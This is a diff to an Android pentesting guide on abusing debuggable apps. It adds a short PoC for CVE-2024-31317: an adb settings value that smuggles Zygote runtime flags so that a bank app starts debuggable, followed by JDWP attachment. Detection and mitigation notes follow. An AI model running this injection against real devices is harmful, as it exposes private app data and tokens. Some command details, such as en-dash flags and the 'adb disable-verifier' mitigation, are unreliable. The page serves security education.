diff --git a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md index d080e52f1b2..77f532c1ec7 100644 --- a/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md +++ b/src/mobile-pentesting/android-app-pentesting/exploiting-a-debuggeable-applciation.md @@ -15,7 +15,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass 1. **Decompile the APK:** - Utilize the APK-GUI tool for decompiling the APK. - - In the _android-manifest_ file, insert `android:debuggable=true` to enable debugging mode. + - In the _android-manifest_ file, insert `android:debuggable="true"` to enable debugging mode. - Recompile, sign, and zipalign the modified application. 2. **Install the Modified Application:** @@ -30,7 +30,7 @@ Content based on https://medium.com/@shubhamsonani/hacking-with-precision-bypass - Command: `adb shell am setup-debug-app –w `. - **Note:** This command must be run each time before starting the application to ensure it waits for the debugger. - - For persistence, use `adb shell am setup-debug-app –w -–persistent `. + - For persistence, use `adb shell am setup-debug-app –w ––persistent `. - To remove all flags, use `adb shell am clear-debug-app `. 5. **Prepare for Debugging in Android Studio:** @@ -83,12 +83,47 @@ A demonstration was provided using a vulnerable application containing a button This example demonstrated how the behavior of a debuggable application can be manipulated, highlighting the potential for more complex exploits like gaining shell access on the device in the application's context. +--- + +# 2024 – Turning **any** application into a debuggable process (CVE-2024-31317) + +Even if the target APK is _not_ shipped with the `android:debuggable` flag, recent research showed that it is possible to force **arbitrary applications** to start with the `DEBUG_ENABLE_JDWP` runtime flag by abusing the way Zygote parses command-line arguments. + +* **Vulnerability:** Improper validation of `--runtime-flags` supplied through Zygote’s command socket allows an attacker that can reach `system_server` (for example via the privileged `adb` shell which owns the `WRITE_SECURE_SETTINGS` permission) to inject extra parameters. When the crafted command is replayed by `system_server`, the victim app is forked as _debuggable_ and with a JDWP thread listening. The issue is tracked as **CVE-2024-31317** and was fixed in the June 2024 Android Security Bulletin. +* **Impact:** Full read/write access to the private data directory of **any** app (including privileged ones such as `com.android.settings`), token theft, MDM bypass, and in many cases a direct path to privilege-escalation by abusing exported IPC endpoints of the now-debuggable process. +* **Affected versions:** Android 9 through 14 prior to the June 2024 patch level. + +## Quick PoC + +```bash +# Requires: adb shell (device must be <2024-06-01 patch-level) +# 1. Inject a fake API-denylist exemption that carries the malicious Zygote flag +adb shell settings put global hidden_api_blacklist_exemptions "--runtime-flags=0x104|Lcom/example/Fake;->entryPoint:" + +# 2. Launch the target app – it will be forked with DEBUG_ENABLE_JDWP +adb shell monkey -p com.victim.bank 1 + +# 3. Enumerate JDWP PIDs and attach with jdb / Android-Studio +adb jdwp # obtain the PID +adb forward tcp:8700 jdwp: +jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=8700 +``` + +> The crafted value in step 1 breaks the parser out of the “fast-path” and appends a second synthetic command where `--runtime-flags=0x104` (`DEBUG_ENABLE_JDWP | DEBUG_JNI_DEBUGGABLE`) is accepted as if it had been supplied by the framework. Once the app is spawned, a JDWP socket is opened and regular dynamic-debug tricks (method replacement, variable patching, live Frida injection, etc.) are possible **without modifying the APK or the device boot image**. + +## Detection & Mitigation + +* Patch to **2024-06-01** (or later) security level – Google hardened `ZygoteCommandBuffer` so that subsequent commands cannot be smuggled in this way. +* Restrict `WRITE_SECURE_SETTINGS` / `shell` access on production devices. The exploit requires this permission, which is normally only held by ADB or OEM-privileged apps. +* On EMM/MDM-managed fleets, enforce `ro.debuggable=0` and deny shell via `adb disable-verifier`. + +--- + ## References - [https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0](https://medium.com/@shubhamsonani/hacking-with-precision-bypass-techniques-via-debugger-in-android-apps-27fd562b2cc0) - [https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications](https://resources.infosecinstitute.com/android-hacking-security-part-6-exploiting-debuggable-android-applications) +- [https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html](https://rtx.meta.security/exploitation/2024/06/03/Android-Zygote-injection.html) +- [https://blog.flanker017.me/cve-2024-31317/](https://blog.flanker017.me/cve-2024-31317/) {{#include ../../banners/hacktricks-training.md}} - - -